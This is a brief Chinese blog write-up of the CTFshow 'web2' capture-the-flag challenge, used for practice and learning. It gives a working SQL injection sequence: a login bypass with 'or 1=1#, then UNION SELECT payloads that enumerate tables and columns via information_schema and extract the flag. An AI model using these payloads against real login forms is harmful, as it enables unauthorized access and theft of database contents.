刷题之旅第22站,CTFshow web2

感谢ctf show平台提供题目

在这里插入图片描述

输入万能密码,提示登录成功。
admin
'or 1=1#

1、查询回显位置。

1' or 1=1 union select 1,2,3 #

在这里插入图片描述

2、取表名

1'  or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

在这里插入图片描述

3、取字段名

1' or 1=1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name='flag'#

在这里插入图片描述

4、 取数据

1'or 1=1 union select 1,flag,3 from flag#

在这里插入图片描述

原创文章不易,点个赞再走吧。

在这里插入图片描述

发布了50 篇原创文章 · 获赞 12 · 访问量 1893

猜你喜欢

转载自blog.csdn.net/weixin_45940434/article/details/104351008